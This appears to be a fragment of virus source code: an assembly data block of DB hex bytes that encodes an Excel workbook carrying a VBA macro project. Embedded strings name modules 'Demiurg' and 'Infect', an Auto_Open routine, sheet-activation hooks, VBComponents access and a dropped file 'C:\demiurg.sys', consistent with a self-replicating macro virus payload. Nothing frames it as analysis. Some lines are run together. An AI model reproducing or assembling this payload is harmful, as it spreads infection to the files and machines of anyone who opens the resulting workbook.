DB 0E6H, 004H, 000H, 065H, 010H, 000H, 030H, 070H
DB 06AH, 054H, 030H, 0ECH, 004H, 09AH, 000H, 04CH
DB 000H, 000H, 000H, 0D9H, 010H, 000H, 030H, 0ECH
DB 004H, 09AH, 000H, 070H, 06AH, 054H, 030H, 04CH
DB 000H, 000H, 000H, 0CEH, 05AH, 054H, 030H, 0BAH
DB 0C7H, 062H, 000H, 0C0H, 0C7H, 062H, 0E6H, 00DH
DB 000H, 0A2H, 0C7H, 010H, 030H, 009H, 004H, 0E6H
DB 00ah, 000H, 024H, 000H, 000H, 000H, 0FCH, 0E7H
DB 062H, 000H, 0F3H, 083H, 00FH, 030H, 04CH, 0C7HDB 062H, 000H, 001H, 000H, 000H, 000H, 010H, 0A3H
DB 09AH, 0E6H, 009H, 000H, 0C0H, 0C7H, 062H, 0E6H
DB 005H, 000H, 010H, 0A3H, 09AH, 0E6H, 005H, 000H
DB 0F4H, 0C6H, 062H, 000H, 06EH, 083H, 00FH, 030H
DB 0E6H, 024H, 000H, 038H, 005H, 09CH, 000H, 0DCH
DB 0C7H, 062H, 000H, 014H, 000H, 000H, 000H, 0E0H
DB 000H, 000H, 000H, 0A8H, 0C7H, 062H, 000H, 0FCH
DB 0E7H, 062H, 0E6H, 005H, 000H, 01CH, 0A2H, 09AH
DB 000H, 0C4H, 0C7H, 062H, 000H, 09AH, 020H, 000H
DB 030H, 01CH, 0A2H, 09AH, 000H, 073H, 090H, 00AH
DB 000H, 000H, 000H, 009H, 008H, 010H, 000H, 000H
DB 006H, 010H, 000H, 0D3H, 010H, 0CCH, 007H, 041H
DB 000H, 000H, 000H, 006H, 000H, 000H, 000H, 00BH
DB 002H, 010H, 0E6H, 00DH, 000H, 03EH, 00ah, 000H
DB 000H, 00DH, 000H, 002H, 000H, 001H, 000H, 00CH
DB 000H, 002H, 000H, 064H, 000H, 00FH, 000H, 002H
DB 000H, 001H, 000H, 011H, 000H, 002H, 000H, 000H
DB 000H, 010H, 000H, 008H, 000H, 0FCH, 0A9H, 0F1H
DB 0D2H, 04DH, 062H, 050H, 03FH, 05FH, 000H, 002H
DB 000H, 001H, 000H, 02AH, 000H, 002H, 000H, 000H
DB 000H, 02BH, 000H, 002H, 000H, 000H, 000H, 082H
DB 000H, 002H, 000H, 001H, 000H, 080H, 000H, 008H
DB 0E6H, 009H, 000H, 025H, 002H, 004H, 000H, 000H
DB 000H, 0FFH, 000H, 081H, 000H, 002H, 000H, 0C1H
DB 004H, 014H, 000H, 000H, 000H, 015H, 000H, 000H
DB 000H, 083H, 000H, 002H, 000H, 000H, 000H, 084H
DB 000H, 002H, 000H, 000H, 000H, 0A1H, 000H, 022H
DB 000H, 000H, 000H, 0FFH, 000H, 001H, 000H, 001H
DB 000H, 001H, 000H, 004H, 000H, 0DEH, 0C7H, 062H
DB 000H, 08AH, 01DH, 03CH, 0FCH, 0FDH, 07EH, 0DFH
DB 03FH, 08AH, 01DH, 03CH, 0FCH, 0FDH, 07EH, 0DFH
DB 03FH, 0CEH, 05AH, 055H, 000H, 002H, 000H, 00ah
DB 000H, 000H, 002H, 00Eh, 0E6H, 00FH, 000H, 03EH
DB 002H, 012H, 000H, 0B6H, 006H, 0E6H, 004H, 000HDB 040H, 0E6H, 00BH, 000H, 01DH, 000H, 00FH, 000H
DB 003H, 0E6H, 006H, 000H, 001H, 0E6H, 007H, 000H
DB 0BAH, 001H, 00BH, 000H, 008H, 000H, 000H, 054H
DB 061H, 062H, 065H, 06CH, 06CH, 065H, 031H, 00AH
DB 0E6H, 031H, 000H, 001H, 016H, 001H, 000H, 000H
DB 0B6H, 000H, 0FFH, 0FFH, 001H, 001H, 0E6H, 004H
DB 000H, 0E6H, 004H, 0FFH, 0E6H, 004H, 000H, 0E6H
DB 006H, 0FFH, 0E6H, 034H, 000H, 010H, 000H, 000H
DB 000H, 003H, 000H, 000H, 000H, 005H, 000H, 000H
DB 000H, 007H, 000H, 000H, 000H, 0E6H, 008H, 0FFH
DB 001H, 001H, 008H, 000H, 000H, 000H, 0E6H, 004H
DB 0FFH, 078H, 000H, 000H, 000H, 0DEH, 000H, 000H
DB 000H, 0AFH, 002H, 000H, 000H, 0F5H, 001H, 000H
DB 000H, 0E6H, 004H, 0FFH, 0E6H, 004H, 000H, 001H
DB 000H, 000H, 000H, 0B5H, 031H, 0B7H, 031H, 000H
DB 000H, 0FFH, 0FFH, 023H, 000H, 000H, 000H, 088H
DB 000H, 000H, 000H, 008H, 0E6H, 020H, 000H, 0FFH
DB 0FFH, 000H, 000H, 0CBH, 002H, 000H, 000H, 0D6H
DB 000H, 000H, 000H, 0D6H, 000H, 000H, 000H, 01FH
DB 003H, 0E6H, 004H, 000H, 0E6H, 004H, 0FFH, 0E6H
DB 004H, 000H, 0DFH, 000H, 0FFH, 0FFH, 0E6H, 004H
DB 000H, 00CH, 000H, 0E6H, 058H, 0FFH, 044H, 000H
DB 069H, 000H, 065H, 000H, 073H, 000H, 065H, 000H
DB 041H, 000H, 072H, 000H, 062H, 000H, 065H, 000H
DB 069H, 000H, 074H, 000H, 073H, 000H, 06DH, 000H
DB 061H, 000H, 070H, 000H, 070H, 000H, 065H, 0E6H
DB 01FH, 000H, 024H, 000H, 002H, 001H, 007H, 000H
DB 000H, 000H, 0E6H, 008H, 0FFH, 0E6H, 024H, 000H
DB 02BH, 000H, 000H, 000H, 0CAH, 003H, 0E6H, 006H
DB 000H, 054H, 000H, 061H, 000H, 062H, 000H, 065H
DB 000H, 06CH, 000H, 06CH, 000H, 065H, 000H, 031H
DB 0E6H, 031H, 000H, 012H, 000H, 002H, 001H, 006H
DB 000H, 000H, 000H, 004H, 000H, 000H, 000H, 0E6H
DB 004H, 0FFH, 0E6H, 024H, 000H, 03BH, 000H, 000HDB 000H, 0BFH, 003H, 0E6H, 006H, 000H, 044H, 000H
DB 065H, 000H, 06DH, 000H, 069H, 000H, 075H, 000H
DB 072H, 000H, 067H, 0E6H, 033H, 000H, 010H, 000H
DB 002H, 001H, 008H, 000H, 000H, 000H, 0E6H, 008H
DB 0FFH, 0E6H, 024H, 000H, 04AH, 000H, 000H, 000H
DB 01FH, 007H, 0E6H, 006H, 000H, 05FH, 000H, 056H
DB 000H, 042H, 000H, 041H, 000H, 05FH, 000H, 050H
DB 000H, 052H, 000H, 04FH, 000H, 04AH, 000H, 045H
DB 000H, 043H, 000H, 054H, 0E6H, 029H, 000H, 01AH
DB 000H, 002H, 000H, 0E6H, 00CH, 0FFH, 0E6H, 024H
DB 000H, 067H, 000H, 000H, 000H, 059H, 00CH, 0E6H
DB 006H, 000H, 0E6H, 028H, 0FFH, 028H, 000H, 000H
DB 000H, 002H, 000H, 053H, 04CH, 0E6H, 004H, 0FFH
DB 000H, 000H, 001H, 000H, 053H, 010H, 0E6H, 004H
DB 0FFH, 000H, 000H, 001H, 000H, 053H, 094H, 0E6H
DB 004H, 0FFH, 0E6H, 004H, 000H, 002H, 03CH, 0E6H
DB 004H, 0FFH, 000H, 000H, 0FFH, 0FFH, 001H, 001H
DB 0E6H, 004H, 000H, 001H, 000H, 04EH, 000H, 030H
DB 000H, 07BH, 000H, 030H, 000H, 030H, 000H, 030H
DB 000H, 032H, 000H, 030H, 000H, 038H, 000H, 031H
DB 000H, 039H, 000H, 02DH, 000H, 030H, 000H, 030H
DB 000H, 030H, 000H, 030H, 000H, 02DH, 000H, 030H
DB 000H, 030H, 000H, 030H, 000H, 030H, 000H, 02DH
DB 000H, 043H, 000H, 030H, 000H, 030H, 000H, 030H
DB 000H, 02DH, 000H, 030H, 000H, 030H, 000H, 030H
DB 000H, 030H, 000H, 030H, 000H, 030H, 000H, 030H
DB 000H, 030H, 000H, 030H, 000H, 030H, 000H, 034H
DB 000H, 036H, 000H, 07DH, 0E6H, 007H, 000H, 0DFH
DB 0E6H, 004H, 000H, 0E6H, 004H, 0FFH, 001H, 001H
DB 038H, 000H, 000H, 000H, 002H, 081H, 0FEH, 0E6H
DB 009H, 0FFH, 028H, 0E6H, 005H, 000H, 0FFH, 0FFH
DB 0E6H, 008H, 000H, 0E6H, 008H, 0FFH, 074H, 000H
DB 020H, 000H, 01DH, 000H, 000H, 000H, 024H, 000H
DB 000H, 000H, 0E6H, 004H, 0FFH, 048H, 0E6H, 005HDB 000H, 0FFH, 0FFH, 000H, 000H, 001H, 0E6H, 007H
DB 000H, 0E6H, 00CH, 0FFH, 0E6H, 004H, 000H, 0E6H
DB 010H, 0FFH, 0E6H, 004H, 000H, 0E6H, 010H, 0FFH
DB 0E6H, 008H, 000H, 0E6H, 008H, 0FFH, 0E6H, 004H
DB 000H, 0E6H, 01EH, 0FFH, 04DH, 045H, 000H, 000H
DB 0E6H, 006H, 0FFH, 0E6H, 004H, 000H, 0FFH, 0FFH
DB 0E6H, 004H, 000H, 0FFH, 0FFH, 001H, 001H, 0E6H
DB 040H, 000H, 0FEH, 0CAH, 001H, 000H, 000H, 000H
DB 0E6H, 004H, 0FFH, 001H, 001H, 008H, 000H, 000H
DB 000H, 0E6H, 004H, 0FFH, 078H, 000H, 000H, 000H
DB 001H, 0A7H, 0B0H, 000H, 041H, 074H, 074H, 072H
DB 069H, 062H, 075H, 074H, 000H, 065H, 020H, 056H
DB 042H, 05FH, 04EH, 061H, 06DH, 000H, 065H, 020H
DB 03DH, 020H, 022H, 044H, 069H, 065H, 000H, 073H
DB 065H, 041H, 072H, 062H, 065H, 069H, 074H, 000H
DB 073H, 06DH, 061H, 070H, 070H, 065H, 022H, 00DH
DB 022H, 00ah, 00ah, 0A0H, 042H, 061H, 073H, 002H
DB 0A0H, 030H, 07BH, 000H, 030H, 030H, 030H, 032H
DB 030H, 038H, 031H, 039H, 0EAH, 02DH, 000H, 010H
DB 030H, 003H, 008H, 043H, 000H, 014H, 002H, 012H
DB 001H, 024H, 020H, 030H, 030H, 034H, 036H, 07DH
DB 00DH, 07CH, 043H, 072H, 040H, 065H, 061H, 074H
DB 061H, 062H, 06CH, 001H, 086H, 046H, 010H, 061H
DB 06CH, 073H, 065H, 00CH, 05EH, 050H, 072H, 065H
DB 020H, 064H, 065H, 063H, 06CH, 061H, 000H, 006H
DB 049H, 064H, 011H, 000H, 090H, 054H, 072H, 075H
DB 00DH, 022H, 045H, 078H, 070H, 008H, 06FH, 073H
DB 065H, 014H, 01CH, 054H, 065H, 06DH, 070H, 000H
DB 06CH, 061H, 074H, 065H, 044H, 065H, 072H, 069H
DB 006H, 076H, 002H, 024H, 011H, 065H, 043H, 075H
DB 073H, 074H, 06FH, 018H, 06DH, 069H, 07AH, 004H
DB 044H, 003H, 032H, 0E6H, 036H, 000H, 001H, 016H
DB 001H, 000H, 000H, 0B6H, 000H, 0FFH, 0FFH, 001H
DB 001H, 0E6H, 004H, 000H, 0E6H, 004H, 0FFH, 0E6HDB 004H, 000H, 0E6H, 006H, 0FFH, 0E6H, 034H, 000H
DB 010H, 000H, 000H, 000H, 003H, 000H, 000H, 000H
DB 005H, 000H, 000H, 000H, 007H, 000H, 000H, 000H
DB 0E6H, 008H, 0FFH, 001H, 001H, 008H, 000H, 000H
DB 000H, 0E6H, 004H, 0FFH, 078H, 000H, 000H, 000H
DB 0DEH, 000H, 000H, 000H, 0AFH, 002H, 000H, 000H
DB 0F5H, 001H, 000H, 000H, 0E6H, 004H, 0FFH, 0E6H
DB 004H, 000H, 001H, 000H, 000H, 000H, 0B5H, 031H
DB 0B9H, 031H, 000H, 000H, 0FFH, 0FFH, 023H, 000H
DB 000H, 000H, 088H, 000H, 000H, 000H, 008H, 0E6H
DB 020H, 000H, 0FFH, 0FFH, 000H, 000H, 0CBH, 002H
DB 000H, 000H, 0D6H, 000H, 000H, 000H, 0D6H, 000H
DB 000H, 000H, 01FH, 003H, 0E6H, 004H, 000H, 0E6H
DB 004H, 0FFH, 0E6H, 004H, 000H, 0DFH, 000H, 0FFH
DB 0FFH, 0E6H, 004H, 000H, 00CH, 000H, 0E6H, 080H
DB 0FH, 028H, 000H, 000H, 000H, 002H, 000H, 053H
DB 04CH, 0E6H, 004H, 0FFH, 000H, 000H, 001H, 000H
DB 053H, 010H, 0E6H, 004H, 0FFH, 000H, 000H, 001H
DB 000H, 053H, 094H, 0E6H, 004H, 0FFH, 0E6H, 004H
DB 000H, 002H, 03CH, 0E6H, 004H, 0FFH, 000H, 000H
DB 0FFH, 0FFH, 001H, 001H, 0E6H, 004H, 000H, 001H
DB 000H, 04EH, 000H, 030H, 000H, 07BH, 000H, 030H
DB 000H, 030H, 000H, 030H, 000H, 032H, 000H, 030H
DB 000H, 038H, 000H, 032H, 000H, 030H, 000H, 02DH
DB 000H, 030H, 000H, 030H, 000H, 030H, 000H, 030H
DB 000H, 02DH, 000H, 030H, 000H, 030H, 000H, 030H
DB 000H, 030H, 000H, 02DH, 000H, 043H, 000H, 030H
DB 000H, 030H, 000H, 030H, 000H, 02DH, 000H, 030H
DB 000H, 030H, 000H, 030H, 000H, 030H, 000H, 030H
DB 000H, 030H, 000H, 030H, 000H, 030H, 000H, 030H
DB 000H, 030H, 000H, 034H, 000H, 036H, 000H, 07DH
DB 0E6H, 007H, 000H, 0DFH, 0E6H, 004H, 000H, 0E6H
DB 004H, 0FFH, 001H, 001H, 038H, 000H, 000H, 000H
DB 002H, 081H, 0FEH, 0E6H, 009H, 0FFH, 028H, 0E6HDB 005H, 000H, 0FFH, 0FFH, 0E6H, 008H, 000H, 0E6H
DB 008H, 0FFH, 0E6H, 004H, 000H, 01DH, 000H, 000H
DB 000H, 024H, 000H, 000H, 000H, 0E6H, 004H, 0FFH
DB 048H, 0E6H, 005H, 000H, 0FFH, 0FFH, 000H, 000H
DB 001H, 0E6H, 007H, 000H, 0E6H, 00CH, 0FFH, 0E6H
DB 004H, 000H, 0E6H, 010H, 0FFH, 0E6H, 004H, 000H
DB 0E6H, 010H, 0FFH, 0E6H, 008H, 000H, 0E6H, 008H
DB 0FFH, 0E6H, 004H, 000H, 0E6H, 01EH, 0FFH, 04DH
DB 045H, 000H, 000H, 0E6H, 006H, 0FFH, 0E6H, 004H
DB 000H, 0FFH, 0FFH, 0E6H, 004H, 000H, 0FFH, 0FFH
DB 001H, 001H, 0E6H, 040H, 000H, 0FEH, 0CAH, 001H
DB 000H, 000H, 000H, 0E6H, 004H, 0FFH, 001H, 001H
DB 008H, 000H, 000H, 000H, 0E6H, 004H, 0FFH, 078H
DB 000H, 000H, 000H, 001H, 09CH, 0B0H, 000H, 041H
DB 074H, 074H, 072H, 069H, 062H, 075H, 074H, 000H
DB 065H, 020H, 056H, 042H, 05FH, 04EH, 061H, 06DH
DB 000H, 065H, 020H, 03DH, 020H, 022H, 054H, 061H
DB 062H, 000H, 065H, 06CH, 06CH, 065H, 031H, 022H
DB 00DH, 00AH, 011H, 00ah, 0F8H, 042H, 061H, 073H
DB 002H, 07CH, 030H, 07BH, 030H, 000H, 030H, 030H
DB 032H, 030H, 038H, 032H, 030H, 02DH, 03BH, 000H
DB 020H, 004H, 008H, 043H, 000H, 014H, 002H, 01CH
DB 001H, 024H, 030H, 030H, 008H, 034H, 036H, 07DH
DB 00DH, 07CH, 043H, 072H, 065H, 061H, 010H, 074H
DB 061H, 062H, 06CH, 001H, 086H, 046H, 061H, 06CH
DB 004H, 073H, 065H, 00CH, 0BCH, 050H, 072H, 065H
DB 064H, 065H, 048H, 063H, 06CH, 061H, 000H, 006H
DB 049H, 064H, 000H, 087H, 054H, 004H, 072H, 075H
DB 00DH, 022H, 045H, 078H, 070H, 06FH, 073H, 002H
DB 065H, 014H, 01CH, 054H, 065H, 06DH, 070H, 06CH
DB 061H, 080H, 074H, 065H, 044H, 065H, 072H, 069H
DB 076H, 002H, 024H, 001H, 011H, 065H, 043H, 075H
DB 073H, 074H, 06FH, 06DH, 069H, 006H, 07AH, 004H
DB 088H, 003H, 032H, 000H, 001H, 016H, 001H, 000HDB 001H, 0B6H, 000H, 0FFH, 0FFH, 001H, 001H, 0E6H
DB 004H, 000H, 0E6H, 004H, 0FFH, 0E6H, 004H, 000H
DB 0E6H, 006H, 0FFH, 0E6H, 034H, 000H, 010H, 000H
DB 000H, 000H, 003H, 000H, 000H, 000H, 005H, 000H
DB 000H, 000H, 007H, 000H, 000H, 000H, 0E6H, 008H
DB 0FFH, 001H, 001H, 008H, 000H, 000H, 000H, 0E6H
DB 004H, 0FFH, 078H, 000H, 000H, 000H, 0DEH, 000H
DB 000H, 000H, 037H, 003H, 000H, 000H, 0A5H, 001H
DB 000H, 000H, 0E6H, 004H, 0FFH, 002H, 000H, 000H
DB 000H, 001H, 000H, 000H, 000H, 0B5H, 031H, 0BBH
DB 031H, 000H, 000H, 0FFH, 0FFH, 003H, 0E6H, 007H
DB 000H, 002H, 0E6H, 020H, 000H, 0FFH, 0FFH, 000H
DB 000H, 053H, 003H, 000H, 000H, 0D6H, 000H, 000H
DB 000H, 0D6H, 000H, 000H, 000H, 0B7H, 005H, 0E6H
DB 004H, 000H, 0E6H, 004H, 0FFH, 0E6H, 004H, 000H
DB 0DFH, 000H, 0FFH, 0FFH, 0E6H, 006H, 000H, 0E6H
DB 080H, 0FFH, 028H, 0E6H, 005H, 000H, 002H, 03CH
DB 00ch, 000H, 0FFH, 0FFH, 0E6H, 004H, 000H, 002H
DB 03CH, 0E6H, 004H, 0FFH, 0E6H, 004H, 000H, 002H
DB 03CH, 004H, 000H, 0FFH, 0FFH, 0E6H, 004H, 000H
DB 002H, 03CH, 008H, 000H, 0FFH, 0FFH, 000H, 000H
DB 0FFH, 0FFH, 001H, 001H, 0E6H, 006H, 000H, 0E8H
DB 005H, 0C0H, 038H, 003H, 000H, 0DFH, 0E6H, 004H
DB 000H, 050H, 000H, 000H, 000H, 001H, 001H, 010H
DB 001H, 000H, 000H, 00BH, 012H, 01EH, 002H, 080H
DB 0E6H, 006H, 000H, 060H, 0E6H, 004H, 000H, 0E6H
DB 008H, 0FFH, 0E6H, 004H, 000H, 0E6H, 004H, 0FFH
DB 0E6H, 004H, 000H, 0E6H, 00AH, 0FFH, 000H, 000H
DB 003H, 000H, 003H, 000H, 000H, 000H, 084H, 000H
DB 000H, 001H, 0E6H, 006H, 000H, 080H, 000H, 000H
DB 000H, 0E6H, 004H, 0FFH, 0E6H, 004H, 000H, 0E6H
DB 004H, 0FFH, 0C0H, 000H, 000H, 000H, 028H, 0E6H
DB 007H, 000H, 0E6H, 004H, 0FFH, 068H, 0FFH, 040H
DB 000H, 0E6H, 00AH, 0FFH, 001H, 000H, 003H, 000HDB 003H, 000H, 003H, 000H, 084H, 000H, 000H, 001H
DB 0E6H, 006H, 000H, 00BH, 012H, 02AH, 002H, 0E6H
DB 004H, 0FFH, 002H, 000H, 000H, 060H, 0E6H, 004H
DB 000H, 0E6H, 008H, 0FFH, 0E6H, 004H, 000H, 0E6H
DB 004H, 0FFH, 0E6H, 004H, 000H, 0E6H, 00ah, 0FFH
DB 002H, 000H, 00DH, 000H, 00DH, 000H, 006H, 000H
DB 084H, 000H, 000H, 001H, 000H, 000H, 004H, 000H
DB 0E6H, 006H, 0FFH, 010H, 000H, 000H, 000H, 040H
DB 0E6H, 007H, 000H, 080H, 000H, 000H, 000H, 0E6H
DB 004H, 0FFH, 002H, 083H, 01CH, 002H, 0E6H, 004H
DB 0FFH, 008H, 000H, 0FFH, 0FFH, 000H, 001H, 0E6H
DB 004H, 000H, 0E6H, 006H, 0FFH, 0E6H, 004H, 000H
DB 0E6H, 008H, 0FFH, 0E6H, 004H, 000H, 01DH, 000H
DB 000H, 000H, 024H, 000H, 000H, 000H, 0E6H, 004H
DB 0FFH, 0F0H, 000H, 000H, 000H, 002H, 000H, 002H
DB 0E6H, 00FH, 000H, 0E6H, 010H, 0FFH, 080H, 000H
DB 000H, 000H, 0E6H, 018H, 0FFH, 0D8H, 0E6H, 00BH
DB 000H, 008H, 000H, 004H, 000H, 0E6H, 004H, 0FFH
DB 0E6H, 004H, 000H, 0E6H, 018H, 0FFH, 004H, 000H
DB 040H, 000H, 000H, 000H, 04DH, 045H, 000H, 000H
DB 0E6H, 006H, 0FFH, 0E6H, 004H, 000H, 0FFH, 0FFH
DB 0E6H, 004H, 000H, 0FFH, 0FFH, 001H, 001H, 0E6H
DB 040H, 000H, 0FEH, 0CAH, 001H, 000H, 010H, 000H
DB 022H, 081H, 008H, 000H, 006H, 000H, 00CH, 0E6H
DB 006H, 000H, 081H, 008H, 004H, 012H, 000H, 000H
DB 000H, 008H, 000H, 000H, 000H, 004H, 081H, 008H
DB 000H, 002H, 000H, 000H, 000H, 020H, 000H, 000H
DB 000H, 022H, 081H, 008H, 000H, 006H, 000H, 00CH
DB 000H, 040H, 0E6H, 004H, 000H, 081H, 008H, 004H
DB 00ah, 000H, 000H, 000H, 048H, 0E6H, 004H, 000H
DB 080H, 009H, 0E6H, 005H, 000H, 0E6H, 004H, 0FFH
DB 000H, 081H, 008H, 004H, 026H, 000H, 000H, 000H
DB 058H, 0E6H, 004H, 000H, 081H, 008H, 004H, 02EH
DB 000H, 000H, 000H, 080H, 0E6H, 004H, 000H, 080HDB 009H, 0E6H, 005H, 000H, 0E6H, 004H, 0FFH, 000H
DB 081H, 008H, 008H, 01EH, 000H, 000H, 000H, 0B0H
DB 0E6H, 004H, 000H, 081H, 008H, 00CH, 02CH, 000H
DB 000H, 000H, 0D0H, 0E6H, 004H, 000H, 081H, 008H
DB 008H, 00ah, 0e6h, 004H, 000H, 001H, 000H, 000H
DB 000H, 080H, 009H, 0E6H, 005H, 000H, 0E6H, 004H
DB 0FFH, 000H, 081H, 008H, 004H, 026H, 000H, 000H
DB 000H, 010H, 001H, 000H, 000H, 000H, 081H, 008H
DB 004H, 00ah, 000H, 000H, 000H, 038H, 001H, 000H
DB 000H, 004H, 081H, 008H, 000H, 002H, 000H, 000H
DB 000H, 048H, 001H, 000H, 000H, 0E6H, 004H, 0FFH
DB 001H, 001H, 058H, 001H, 000H, 000H, 08FH, 004H
DB 0E6H, 006H, 000H, 0AEH, 000H, 006H, 000H, 049H
DB 06EH, 066H, 065H, 063H, 074H, 020H, 000H, 020H
DB 002H, 028H, 000H, 022H, 002H, 0E6H, 006H, 0FFH
DB 06CH, 000H, 0FFH, 0FFH, 058H, 000H, 000H, 000H
DB 0AFH, 000H, 020H, 000H, 026H, 002H, 028H, 000H
DB 028H, 002H, 0FFH, 0FFH, 015H, 002H, 000H, 000H
DB 06CH, 000H, 0FFH, 0FFH, 038H, 000H, 000H, 000H
DB 08FH, 004H, 080H, 0E6H, 005H, 000H, 0AFH, 000H
DB 020H, 000H, 020H, 002H, 028H, 000H, 02CH, 002H
DB 0E6H, 006H, 0FFH, 020H, 000H, 032H, 002H, 021H
DB 000H, 008H, 001H, 020H, 000H, 032H, 002H, 021H
DB 000H, 008H, 001H, 01BH, 000H, 0A4H, 000H, 001H
DB 000H, 024H, 020H, 0FCH, 000H, 003H, 000H, 024H
DB 000H, 030H, 002H, 001H, 000H, 027H, 000H, 02EH
DB 002H, 000H, 000H, 0AEH, 000H, 001H, 000H, 031H
DB 000H, 024H, 000H, 030H, 002H, 001H, 000H, 020H
DB 000H, 02EH, 002H, 007H, 000H, 020H, 000H, 02EH
DB 002H, 0AEH, 000H, 001H, 000H, 039H, 000H, 024H
DB 000H, 030H, 002H, 001H, 000H, 007H, 000H, 004H
DB 000H, 094H, 000H, 046H, 000H, 075H, 000H, 067H
DB 000H, 000H, 0F0H, 0F7H, 000H, 020H, 000H, 034H
DB 002H, 0F6H, 000H, 0A4H, 000H, 001H, 000H, 020HDB 000H, 032H, 002H, 021H, 000H, 036H, 002H, 021H
DB 000H, 038H, 002H, 021H, 000H, 03AH, 002H, 08BH
DB 000H, 000H, 000H, 020H, 000H, 034H, 002H, 020H
DB 000H, 032H, 002H, 021H, 000H, 036H, 002H, 025H
DB 000H, 038H, 002H, 001H, 000H, 021H, 000H, 008H
DB 001H, 0AEH, 000H, 007H, 000H, 044H, 065H, 06DH
DB 069H, 075H, 072H, 067H, 000H, 005H, 000H, 094H
DB 000H, 046H, 000H, 075H, 000H, 067H, 000H, 0F8H
DB 000H, 000H, 000H, 0F7H, 000H, 020H, 000H, 034H
DB 002H, 0F6H, 000H, 0C0H, 000H, 000H, 0A0H, 048H
DB 037H, 044H, 000H, 0AEH, 000H, 00Eh, 000H, 043H
DB 03AH, 05CH, 064H, 065H, 06DH, 069H, 075H, 072H
DB 067H, 02EH, 073H, 079H, 073H, 01DH, 000H, 020H
DB 000H, 032H, 002H, 021H, 000H, 036H, 002H, 021H
DB 000H, 038H, 002H, 042H, 040H, 03CH, 002H, 001H
DB 000H, 000H, 000H, 020H, 000H, 032H, 002H, 042H
DB 040H, 03EH, 002H, 0E6H, 004H, 000H, 021H, 000H
DB 000H, 0A0H, 06CH, 000H, 0FFH, 0FFH, 0A8H, 000H
DB 000H, 000H, 0E6H, 004H, 0FFH, 0A8H, 000H, 000H
DB 000H, 001H, 064H, 0B1H, 000H, 041H, 074H, 074H
DB 072H, 069H, 062H, 075H, 074H, 000H, 065H, 020H
DB 056H, 042H, 05FH, 04EH, 061H, 06DH, 000H, 065H
DB 020H, 03DH, 020H, 022H, 044H, 065H, 06DH, 000H
DB 069H, 075H, 072H, 067H, 022H, 00DH, 00ah, 053H
DB 000H, 075H, 062H, 020H, 041H, 075H, 074H, 06FH
DB 05FH, 000H, 04FH, 070H, 065H, 06EH, 028H, 029H
DB 00DH, 00AH, 002H, 020H, 000H, 000H, 041H, 070H
DB 070H, 06CH, 069H, 063H, 000H, 061H, 074H, 069H
DB 06FH, 06EH, 02EH, 04FH, 06EH, 000H, 053H, 068H
DB 065H, 065H, 074H, 041H, 063H, 074H, 018H, 069H
DB 076H, 061H, 000H, 08AH, 000H, 07AH, 049H, 06EH
DB 066H, 008H, 065H, 063H, 074H, 000H, 078H, 045H
DB 06EH, 064H, 020H, 00FH, 000H, 080H, 003H, 08AH
DB 003H, 02AH, 011H, 084H, 044H, 069H, 073H, 070HDB 000H, 06CH, 061H, 079H, 041H, 06CH, 065H, 072H
DB 074H, 002H, 073H, 000H, 07EH, 046H, 061H, 06CH
DB 073H, 065H, 00DH, 002H, 00ah, 003H, 06BH, 06CH
DB 061H, 073H, 074H, 063H, 068H, 004H, 061H, 072H
DB 000H, 017H, 041H, 073H, 063H, 028H, 04DH, 010H
DB 069H, 064H, 024H, 028H, 002H, 06CH, 065H, 057H
DB 06FH, 080H, 072H, 06BH, 062H, 06FH, 06FH, 06BH
DB 02EH, 001H, 0B5H, 018H, 02CH, 020H, 04CH, 000H
DB 09FH, 010H, 018H, 029H, 02CH, 020H, 044H, 031H
DB 029H, 004H, 0B7H, 049H, 066H, 020H, 001H, 043H
DB 022H, 080H, 031H, 022H, 029H, 020H, 03CH, 03DH
DB 020H, 006H, 05AH, 05EH, 041H, 080H, 053H, 006H
DB 006H, 000H, 00CH, 002H, 012H, 039H, 000H, 012H
DB 054H, 000H, 068H, 065H, 06EH, 020H, 045H, 078H
DB 069H, 074H, 007H, 003H, 063H, 083H, 048H, 081H
DB 080H, 046H, 06FH, 072H, 020H, 069H, 041H, 000H
DB 049H, 031H, 020H, 054H, 06FH, 020H, 08CH, 03AH
DB 056H, 020H, 042H, 050H, 072H, 06FH, 06AH, 080H
DB 080H, 02EH, 056H, 000H, 042H, 043H, 06FH, 06DH
DB 070H, 06FH, 06EH, 065H, 000H, 06EH, 074H, 073H
DB 02EH, 063H, 06FH, 075H, 06EH, 07EH, 074H, 087H
DB 020H, 081H, 022H, 081H, 047H, 081H, 09BH, 007H
DB 065H, 093H, 01DH, 028H, 0DCH, 069H, 029H, 002H
DB 072H, 000H, 038H, 006H, 0CDH, 020H, 08CH, 04DH
DB 081H, 027H, 081H, 081H, 001H, 04EH, 065H, 078H
DB 074H, 020H, 069H, 085H, 09EH, 005H, 023H, 04DH
DB 049H, 000H, 029H, 072H, 074H, 020H, 028H, 022H
DB 010H, 043H, 03AH, 05CH, 064H, 083H, 07EH, 02EH
DB 073H, 079H, 08CH, 073H, 022H, 085H, 07BH, 0CBH
DB 028H, 053H, 061H, 076H, 040H, 067H, 001H, 0C6H
DB 076H, 0E6H, 021H, 000H, 0CCH, 061H, 05EH, 000H
DB 000H, 001H, 000H, 0FFH, 007H, 00CH, 000H, 000H
DB 009H, 004H, 000H, 000H, 0E4H, 004H, 001H, 0E6H
DB 009H, 000H, 001H, 000H, 005H, 000H, 002H, 000HDB 01AH, 001H, 02AH, 000H, 05CH, 000H, 047H, 000H
DB 07BH, 000H, 030H, 000H, 030H, 000H, 030H, 000H
DB 032H, 000H, 030H, 000H, 034H, 000H, 045H, 000H
DB 046H, 000H, 02DH, 000H, 030H, 000H, 030H, 000H
DB 030H, 000H, 030H, 000H, 02DH, 000H, 030H, 000H
DB 030H, 000H, 030H, 000H, 030H, 000H, 02DH, 000H
DB 043H, 000H, 030H, 000H, 030H, 000H, 030H, 000H
DB 02DH, 000H, 030H, 000H, 030H, 000H, 030H, 000H
DB 030H, 000H, 030H, 000H, 030H, 000H, 030H, 000H
DB 030H, 000H, 030H, 000H, 030H, 000H, 034H, 000H
DB 036H, 000H, 07DH, 000H, 023H, 000H, 033H, 000H
DB 02EH, 000H, 030H, 000H, 023H, 000H, 039H, 000H
DB 023H, 000H, 043H, 000H, 03AH, 000H, 05CH, 000H
DB 050H, 000H, 052H, 000H, 04FH, 000H, 047H, 000H
DB 052H, 000H, 041H, 000H, 04DH, 000H, 04DH, 000H
DB 045H, 000H, 05CH, 000H, 047H, 000H, 045H, 000H
DB 04DH, 000H, 045H, 000H, 049H, 000H, 04EH, 000H
DB 053H, 000H, 041H, 000H, 04DH, 000H, 045H, 000H
DB 020H, 000H, 044H, 000H, 041H, 000H, 054H, 000H
